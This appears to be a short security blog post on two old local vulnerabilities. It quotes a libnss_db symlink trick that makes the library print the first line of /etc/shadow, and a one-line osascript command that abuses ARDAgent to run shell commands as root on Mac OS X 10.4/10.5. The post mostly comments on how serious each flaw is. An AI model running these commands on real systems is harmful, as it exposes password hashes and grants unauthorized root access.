The GNU 'libnss_db' library is prone to a local information-disclosure vulnerability.
Local attackers can exploit this issue to read the first line of arbitrary local files. This may lead to further attacks.
libnss_db 2.2.3 is vulnerable; other versions may also be affected.
I was not able to reproduce this on my machine as I did not already have the libnss-db package installed, and the package for my distro has already been fixed, so it does no good to install it.
The discussion shows this as an example:
sudo apt-get install libnss-db
sudo /etc/init.d/nscd stop (in case nscd is installed)
sudo ln -s /etc/shadow DB_CONFIG
line 1: root:*:14553:0:99999:7:::: incorrect name-value pair
Now if you already have sudo(8) privs to stop/start init.d services and use ln(1), I'm guessing there are probably easier ways of obtaining root. Every attack vector should be corrected, but this just seems a like the shooting fish in a barrel with sudo privs as such.
Unfortunately, this is one of those root exploits that's so simple, you don't even need a canned 'sploit to hit. This is one you can write off the top of your head. Ouch!
Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn't switched to via fast user switching. Secure? I think not.
This does, however, require physical access to the box. I've found that you can generally crack anything you have physical access to.